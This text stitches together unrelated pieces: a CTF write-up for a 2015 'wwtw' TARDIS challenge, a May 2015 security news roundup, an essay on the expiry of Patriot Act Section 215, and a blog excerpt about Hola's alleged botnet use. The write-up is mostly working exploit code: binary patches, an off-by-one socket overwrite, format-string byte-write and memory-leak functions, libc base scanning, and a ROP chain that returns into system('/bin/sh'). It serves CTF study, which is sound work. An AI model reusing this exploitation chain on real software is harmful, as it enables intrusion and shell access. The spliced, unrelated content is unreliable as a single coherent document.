I suspect that this was used as a subtle anti-debugging technique.

Part 2c: Skipping the password check

Much like the game, I didn't want to have to deal with entering the password each time around, so I found the call that checks whether or not that password was valid:

.text:0000125E                 test    eax, eax
.text:00001260                 jz      short loc_129C
.text:00001262                 lea     eax, (aWrongKey - 5000h)[ebx] ; "Wrong key!"

And switched the jz ("\x74\x3a") to a jmp ("\xeb\x3a"). Once you've done that, you can type whatever you want (including nothing) for the key.

Part 3: Time travelling

Now that you've started the Tardis, there's another challenge: you can only turn on the console during certain times:

Welcome to the TARDIS!
Your options are:
1. Turn on the console
2. Leave the TARDIS
Selection: 1
Access denied except between May 17 2015 23:59:40 GMT and May 18 2015 00:00:00 GMT

Looking around in IDA, I see some odd stuff happening. For example, the program attempts to connect to localhost on a weird port and read some data from it! The function that does that is called sub_CB0() if you want to have a look. After it connects, it sets up an alarm() that calls sub_E08() every 2 seconds. In that function, it reads 4 bytes from the socket and stores them. Those 4 bytes turned out to be a timestamp.

Basically, it has a little timeserver running on localhost that sends it the current time. If we can make it use a different server, we can provide a custom timestamp and bypass this check. But how?
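(For local testing, by the way, you can just run a stand-in timeserver yourself. A sketch, assuming the one-byte-ping, 4-byte-reply protocol visible in the strace output below, and the little-endian byte order the exploit uses later:)

import socket, struct, time

srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
srv.bind(("127.0.0.1", 1234))
while True:
    _, peer = srv.recvfrom(1)  # the binary writes a single "\0" as a ping
    srv.sendto(struct.pack("<I", int(time.time())), peer)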

I played around quite a bit with this, but I didn't make any breakthroughs till I ran it in strace.

To run the program under strace, we no longer need the debugger, so we have to restore the first two bytes of start() (undoing the "\xcc\x90" breakpoint patch from earlier):

.text:00000A60 31 ED                                   xor     ebp, ebp

and run strace on it to see what's going on:

socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "\0\0\0\0\350\3\0\0", 8) = 0
connect(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("127.0.0.1")}, 16) = 0
write(3, "\0", 1)                       = 1
read(3, 0xffffcd88, 4)                  = -1 ECONNREFUSED (Connection refused)
[...]
--- SIGALRM {si_signo=SIGALRM, si_code=SI_KERNEL, si_value={int=111, ptr=0x6f}} ---
write(3, "\0", 1)                       = 1
read(3, 0xffffc6d8, 4)                  = -1 ECONNREFUSED (Connection refused)
alarm(2)                                = 0
sigreturn() (mask [])                   = 3
read(0, 0x5655a0b0, 9)                  = ? ERESTARTSYS (To be restarted if SA_RESTART is set)
[...]

Basically, it makes the connection and gets a socket numbered 3. Every 2 seconds, it reads a timestamp from the socket. One of the first things I often do while working on CTF challenges is disable alarm() calls, but in this case the alarm was actually needed! I suspected that this was another anti-debugging measure - to catch people who disable alarm() - and that I should therefore look for the vulnerability in the callback function.

It turns out there wasn't really that much code, but the vulnerability was somewhat subtle and I didn't notice until I ran it in strace and typed a bunch of "A"s:

read(0, AAAAAAAAAAAAAAAAAAAAAAAA
"AAAAAAAAA", 9)                 = 9
write(1, "Invalid\n", 8Invalid
)                = 8
[...]
--- SIGALRM {si_signo=SIGALRM, si_code=SI_KERNEL, si_value={int=111, ptr=0x6f}} ---
write(65, "\0", 1)                      = -1 EBADF (Bad file descriptor)
read(65, 0xffffc6d8, 4)                 = -1 EBADF (Bad file descriptor)
alarm(2)                                = 0
[...]

When I put a bunch of "A"s into the prompt, it started reading from socket 65 (aka, 0x41 or "A") instead of from socket 3! There's an off-by-one vulnerability that allows you to change the socket identifier!

If you were to use "AAAAAAAA\0", it would overwrite the socket number with a NUL byte, and instead of reading from socket 3 or 65, it would read from file descriptor 0 - stdin. The very same descriptor we're already sending data to!

Here's the python code to exploit this:

import sys, time

# the 9th byte (the NUL) overflows into the stored socket number,
# changing it from 3 to 0 (stdin)
sys.stdout.write("01234567\0")
sys.stdout.flush()

time.sleep(2) # Has to be at least 2, so the SIGALRM handler fires again

# the handler now reads its 4-byte timestamp from us instead of the timeserver
sys.stdout.write("\x6d\x2b\x59\x55")
sys.stdout.flush()

Those hex bytes are a little-endian timestamp that falls inside the prescribed window. When the program reads that from stdin rather than from the socket it opened, it thinks the time is right and we can then activate the TARDIS!
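If you're wondering where those bytes come from, they're just a Unix timestamp inside the window from the error message, packed little-endian:

import calendar, struct

ts = calendar.timegm((2015, 5, 17, 23, 59, 41))  # May 17 2015 23:59:41 GMT
assert ts == 0x55592b6d
payload = struct.pack("<I", ts)  # "\x6d\x2b\x59\x55"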

Part 3b: Skipping the timestamp check

Once again, in the interest of being able to test without waiting 2 seconds every time, we can disable the timestamp check altogether. To do that, we find the error message:

.text:00001409  lea     eax, (aAccessDeniedEx - 5000h)[ebx] ; "Access denied except between %s and %s\"...

...and look backwards a little bit to find the jump that gets you there:

.text:000013BE E8 45 FA FF FF      call    check_timestamp
.text:000013C3 85 C0               test    eax, eax
.text:000013C5 74 2F               jz      short loc_13F6
.text:000013C7 8D 83 22 E1 FF FF   lea     eax, (aTheTardisConso - 5000h)[ebx] ; "The TARDIS console is online!"

And make sure it never happens (by replacing "\x74\x2F" with "\x90\x90"). Now we can jump directly to pressing "1" to activate the TARDIS and it'll come right online:

$ ./wwtw-blog-nodebug
[...]
Welcome to the TARDIS!
Your options are:
1. Turn on the console
2. Leave the TARDIS
Selection: 1
The TARDIS console is online!Your options are:
1. Turn on the console
2. Leave the TARDIS
3. Dematerialize
Selection:

Part 4: Getting the coordinates

When we select option 3, we're prompted for coordinates:

Your options are:
1. Turn on the console
2. Leave the TARDIS
3. Dematerialize
Selection: 3
Coordinates: 1,2
1.000000, 2.000000
You safely travel to coordinates 1,2

If you look at the function that contains the "You safely travel..." string, you'll see that one of three things can happen:

  • It prints "Invalid coordinates" if you put anything other than two numbers (as defined by strtof() returning with no error, which means we can put a number then text without being "caught")
  • It prints "You safely travel to coordinates [...]" if you put valid coordinates
  • It prints "XXX is occupied by another TARDIS" if some particular set of coordinates are entered

The "XXX" in the output is actually the coordinates the user typed, as a string, passed directly to printf(). And we remember why printf(user_string) is bad, right? (Hint: format string attacks)

The function to calculate the coordinates used a bunch of floating point math, which made me sad - I don't really know how to reverse floating point stuff, and I didn't really want to learn in the middle of a level. Fortunately, I noticed that two global variables were used:

.text:0000112B                 fld     ds:(dbl_3170 - 5000h)[ebx]
[...]
.text:00001153                 fld     ds:(dbl_3178 - 5000h)[ebx]

And if you look at the variables, you'll see:

.rodata:00003170 dbl_3170        dq 51.492137            ; DATA XREF: do_jump_EXPLOITME+104r
.rodata:00003170                                         ; do_jump_EXPLOITME+11Ar
.rodata:00003178 dbl_3178        dq -0.192878            ; DATA XREF: do_jump_EXPLOITME+12Cr
.rodata:00003178                                         ; do_jump_EXPLOITME+13Er

So that's kind of a freebie. If we enter them, it works:

Your options are:
1. Turn on the console
2. Leave the TARDIS
3. Dematerialize
Selection: 3
Coordinates: 51.492137,-0.192878
51.492137, -0.192878
Coordinate 51.492137,-0.192878 is occupied by another TARDIS.  Materializing there would rip a hole in time and space. Choose again.

And, to finish it off, let's verify that there is indeed a format-string vulnerability there:

Coordinates: 51.492137,-0.192878 %x %x %x
51.492137, -0.192878
Coordinate 51.492137,-0.192878 58601366 4049befe ef0f16f4 is occupied by another TARDIS.  Materializing there would rip a hole in time and space. Choose again.

Coordinates: 51.492137,-0.192878 %n
51.492137, -0.192878
Segmentation fault

Yup! :)

Part 4b: Format string exploit

I'm not going to spend any time explaining what a format string vulnerability is. If you aren't familiar, check out my last blog.

Instead, we're going to look at how I exploited this one. :)

The cool thing about this is, as you can see in the last example, that if you enter "collision" coordinates (i.e., the ones that trigger the format string vulnerability), the function doesn't actually return; it just prompts again. The function doesn't return until you enter valid-looking coordinates (like 1,1).

That's really handy, because it means we can exploit it over and over before letting it return. Instead of the crazy math we had to do in the earlier level, we can just write one byte at a time. And speaking of the last level, I actually solved this level before babyecho, so I didn't have the handy format-string generator that I wrote.

write_byte()

I wrote a function in python that will write a single byte to a chosen address:

import struct, sys

def write_byte(addr, value):
    # collision coordinates, then the target address (argument 20 on the stack)
    s = "51.492137,-0.192878 " + struct.pack("<I", addr)
    # pad so the total output length is value + 256; its low byte is `value`
    s += "%" + str(value + 256 - 24) + "x%20$n\n"

    print s
    sys.stdout.flush()
    sys.stdin.readline()

Basically, it uses the classic "AAAA%NNx%MM$n" string, which we saw a whole bunch in babyecho, where:

  • AAAA = the address as a 4-byte string (which will be the address written to by the %n)
  • NN = the number of bytes to waste to ensure that %n writes the proper value to AAAA (keeping in mind that the coordinates and address take up 24 bytes already)
  • MM = the number of elements on the stack before the format string reads itself (we can figure that out by bruteforce then hardcode it)

If that doesn't make sense, read the last blog - this is exactly the same attack (except simpler, because we only have to write a single byte).
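As a quick sanity check on the arithmetic, here's the padding math for a single write (assuming the 24-byte prefix - 20 characters of coordinates plus the 4 address bytes):

value = 0x7f                   # the byte we want to write
pad = value + 256 - 24         # 359: field width for the %x
printed = 24 + pad             # 383 characters output when the %n fires
assert printed % 256 == value  # the low byte of the count is our byte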

leak()

Meanwhile, my teammate wrote this function that, while ugly, can leak arbitrary memory addresses using "%s":

import re, struct, sys

def leak(address):
    print >> sys.stderr, "*** Leak 0x%04x" % address
    # this first format string was an abandoned attempt; the next line overwrites it
    s = "51.492137,-0.192878 " + struct.pack("<I", address) + " >>>%20$s<<<"
    s = "    51.492137,-0.192878 >>>%24$s<<< " + struct.pack("<IIII", address, address, address, address)
    #print >> sys.stderr, "s", repr(s)
    print s
    sys.stdout.flush()
    sys.stdin.readline() # Echoed coordinates.
    resp = sys.stdin.readline()
    #print >> sys.stderr, "resp", repr(resp)
    m = re.search(r'>>>(.*)<<<', resp, flags=re.DOTALL)
    while m is None:
        # the leaked bytes may contain newlines; keep reading until the closing marker arrives
        extra = sys.stdin.readline()
        assert extra, repr(extra)
        resp += extra
        print >> sys.stderr, "read again", repr(resp)
        m = re.search(r'>>>(.*)<<<', resp, flags=re.DOTALL)
    assert m is not None, repr(resp)
    resp = m.group(1)
    if resp == "":
        resp = "\0"  # %s prints nothing for a NUL byte; normalize that to "\0"
    return resp

Then, exactly like the last blog, we use the vulnerability to leak a return address and frame pointer, then overwrite the return address with a chosen address, and thus obtain EIP control.
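In sketch form, the bookkeeping after those leaks is just fixed offsets from the leaked values (the offsets below are placeholders for illustration; the real ones come from inspecting the stack in gdb):

saved_ebp = 0xffffcd48           # example frame pointer leaked with the format string
return_ptr = saved_ebp - 0x10c   # placeholder: fixed distance to the return-address slot
buffer_addr = saved_ebp - 0x1f8  # placeholder: fixed distance to our own input buffer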

Getting libc's base address

Next, we needed an address to return to. This was a little tricky, since I wasn't able to steal a copy of their libc.so file (this was the only 32-bit level our team worked on) - that means I could easily exploit myself, because I have my own libc handy, but I couldn't exploit them. There's a pwntools module that can find base addresses given a memory leak, but it was too slow and the binary would time out before it finished (more on that later).

So, I used the format-string vulnerability and a bit of experience to get the base address of libc. We use %s in the format string to leak the resolved address of any imported libc function out of the binary's GOT - I chose printf() because it's the first one I could think of. The GOT entry is at a static offset in the wwtw binary file (we already know the return address, since we leaked it off the stack, and that can be used to calculate where the GOT is).

Once I had that address, I worked my way backwards, reading the first bytes of each page (multiple of 0x1000) until I found an ELF header. Here's the code:

# start a guessed distance below printf() and walk backwards one page at a
# time until we hit libc's ELF header
bf = printf_addr - 0xc280
while True:
    print >> sys.stderr, "Checking", hex(bf), " (printf - ", hex(printf_addr - bf), ")..."
    str = leak(bf)
    print >> sys.stderr, hexify(str)
    if(str[0:4] == "\x7FELF"):
        break

    bf -= 0x1000

I now had the relative offset of printf(), which means given the address of printf(), I can find the base address deterministically.
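In code, that determinism is just a subtraction (continuing from the scan above):

PRINTF_OFFSET = printf_addr - bf  # recorded once; constant for this libc build
libc_base = printf_addr - PRINTF_OFFSET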

Getting system()'s address

Once I had the base address, I wanted to find the address of system(). I don't normally like using stuff I didn't write, because it's really hard to troubleshoot when there's a problem, but I couldn't find an easy way to do this by bruteforce, so I tried using pwntools ('leak' refers to the function shown earlier):

d = dynelf.DynELF(leak, libc_base_REAL)
system_addr = d.lookup("system", 'libc')

Once again, this was too slow and kept timing out. I looked at some options, like stealing the libc binary from memory by returning into the write() libc function (like I did in ropasaurusrex) or trying to make pwntools start where it left off after being disconnected, but none of it would work.

(in retrospect, I probably could have silently re-connected/re-solved the first half of the level in the leak() function and just continued where I left off, but that didn't occur to me till now, like two weeks later)

After fighting for far too long, I had a realization: maybe my home Internet connection just sucks. I uploaded the script to my server and it found the address on the first try (and solved the game portion like 10x faster).

Getting "/bin/sh"'s address

Although I ended up with the address of system(), getting the address of "/bin/sh" from libc might be a bit tricky, so instead I simply put the string in my own input buffer - the same buffer that contains the format string - and calculated the offset from the leaked ebp value to that address. Since it was on the stack, it was always at a fixed offset from the saved ebp, which we had access to.

I could easily have leaked libc until I found the offset to the string, but that's completely unnecessary.

Building the ROP chain

In the end, I had the address of system() and the address of "/bin/sh" in my buffer. I used them to construct a really simple ROP chain, similar to the one used in r0pbaby (the difference is that, since we're on 32-bit for this level, we can pass the address of "/bin/sh" on the stack and don't have to worry about finding a gadget):

write_byte(return_ptr+0, (system_addr >> 0) & 0x0FF)
write_byte(return_ptr+1, (system_addr >> 8) & 0x0FF)
write_byte(return_ptr+2, (system_addr >> 16) & 0x0FF)
write_byte(return_ptr+3, (system_addr >> 24) & 0x0FF)

write_byte(return_ptr+4, 0x5e)
write_byte(return_ptr+5, 0x5e)
write_byte(return_ptr+6, 0x5e)
write_byte(return_ptr+7, 0x5e)

sh_addr = buffer_addr + 200 + FUDGE
write_byte(return_ptr+8,  (sh_addr >> 0) & 0x0FF)
write_byte(return_ptr+9,  (sh_addr >> 8) & 0x0FF)
write_byte(return_ptr+10, (sh_addr >> 16) & 0x0FF)
write_byte(return_ptr+11, (sh_addr >> 24) & 0x0FF)

Basically, I wrote the 4-byte address of system() over the actual return address in four separate printf() calls. Then I wrote 4 useless bytes (they don't really matter - they're system()'s return address so I made them something distinct so I can recognize the crash after system() returns). Then I wrote the address of "/bin/sh" over the next 4 bytes (the first parameter to system()).
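Laid out relative to the overwritten return slot, the finished frame looks like this:

return_ptr + 0: system_addr  <- "ret" pops this; execution enters system()
return_ptr + 4: 0x5e5e5e5e   <- system()'s own return address (recognizable junk)
return_ptr + 8: sh_addr      <- system()'s first argument: "/bin/sh" in our buffer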

Once that was done, I sent "good" coordinates - 100000,100000 - which caused the function to return. Since the return address had been overwritten, it returned to system("/bin/sh") and it was game over.

Conclusion

I really liked this level because it had multiple parts.

First, we had to solve a game by making some simple AI.

Second, we had to find the "key" by either reverse engineering or debugging.

Third, we had to fix the timestamp using an off-by-one error.

And finally, we had to use a format string vulnerability to get EIP control and win the level.

One interesting dynamic of this level was its anti-debugging features. One was the alarm() timer that the off-by-one exploit depends on, since people frequently remove calls to alarm(); the other was using the first few bytes of a function as key material, which messes with software breakpoints.

Community news and analysis: May 2015

Featured news

  • How effective are the security questions—and answers—used to protect sensitive accounts and information? Not very, according to new Google research. Read about how easy it is for hackers and bots to guess answers to common questions, and what users can do about it.
  • Google also published research last month on the ad injection economy (key findings here, full report here).
  • Mozilla sent a communication to CAs with root certificates included in Mozilla’s program; acting in the best interest of users, Mozilla asked the CAs to respond to five action items, and it has stated it intends to publish the responses this month.
  • WordPress users: The Automattic team released WordPress 4.2.2, featuring critical security fixes, the first week of May. Please make sure you’re updated!
  • DomainTools put together their first report profiling malicious domains by delving into domain registration attributes and overlaying this with data on malicious activity. Their summary links to the full report here.

Malware news + analysis

  • ESET: Whitepaper on CPL malware in Brazil
  • Sophos: “PolloCrypt” ransomware sounds as ridiculous as its mascots look—but it’s a real thing targeting Aussie users. Also from Sophos: Can Rombertik malware really destroy your computer? Nope.
  • Fortinet analyses of Rombertik malware and Tinba botnet malware
  • Sucuri: Hacked websites redirect to...Bitcoin?

Other security news

  • SiteLock: Who else is reading your email? A guide to PGP encryption
  • Fortinet: Should new WHO disease-naming guidelines also be applied to malware?

Sunset for section 215, but is the world better now?

Section 215 of the US Patriot Act has been in the headlines a lot lately. This controversial section was used by US intelligence agencies to scoop up large quantities of US phone records, among other things. The section had a sunset clause and needed to be renewed periodically, with the latest deadline at midnight on May 31st, 2015. The renewal had previously been a rubber-stamp affair, but not this time. Section 215 has expired and been replaced by the Freedom Act, which is supposed to be more restrictive and better protect our privacy. And that made headline news globally.

But what does this mean in practice? Is this the end of the global surveillance Edward Snowden made us aware of? How significant is this change in reality? These are questions that aren’t necessarily answered by the news coverage.

Let’s keep this simple and avoid going into details. Section 215 was just one part of a huge legal and technical surveillance system. The old Section 215 allowed very broad secret warrants to be issued by FISA courts using secret interpretations of the law, forcing companies to hand over massive amounts of data about citizens’ communications. All this happened under gag orders preventing anyone from talking about it or even seeking legal advice. The best known example was probably the bulk collection of US phone records. It’s not about tapping phones, but rather about keeping track of who called whom at what time. People in the US could quite safely assume that if they placed calls, the NSA had them on record.

The Freedom Act that replaces it still allows a lot of surveillance, but it aims to restrict the much-criticized mass surveillance. Surveillance under the Freedom Act needs to be more specific than under Section 215. The authorities can’t just tell a telecom operator to hand over all phone records to see if they can find something suspicious; now they have to specify an individual or a device they are interested in. Telecom operators must store certain data about all customers, but only hand over the requested data. That’s not much of a burden, as it is pretty much data that the operators have to keep anyway for billing purposes.

This sounds good on paper, but reality may not be so sunny. First, the Freedom Act is new and we don’t know yet how it will work in practice. Its interpretation may turn out to be more or less privacy-friendly; time will tell. Surveillance legislation is also a huge and complex whole, and a specific kind of surveillance may very well continue, sanctioned by some other provision, even though Section 215 is gone. It’s also misleading when the media reports that Section 215 intelligence collection stopped on June 1st. In reality it continues for at least six months, maybe longer, to safeguard ongoing investigations.

So the conclusion is that the practical impact of this mini-reform is a lot less significant than the headlines would suggest. It’s not the end of surveillance, and it doesn’t guarantee privacy for people using US-based services. It is, however, an important and welcome signal that the political climate in the US is changing, and a sign of a more balanced view of security versus basic human rights. Let’s hope that this climate change continues.


Safe surfing,
Micke

Image by Christian Holmér

It’s no Fun Being Right All the Time

Last week, I finally got around to writing about HideMyAss, and doing a spot of speculation about how other proxy anonymizers earn their coin. Almost immediately after I hit "publish", I spotted this article pop up on ZDNet. Apparently/allegedly, Hola subsidise their income by turning your machine into a part-time member of a botnet.
Normally, I really enjoy being proved right - ask my long-suffering colleagues. In this case, though, I'd rather the news wasn't quite so worrying. A bit of advertising, click hijacking and so forth is liveable. Malware? You can get rid of it... but a botnet client means you might be part of something illegal, and you'd never know the difference.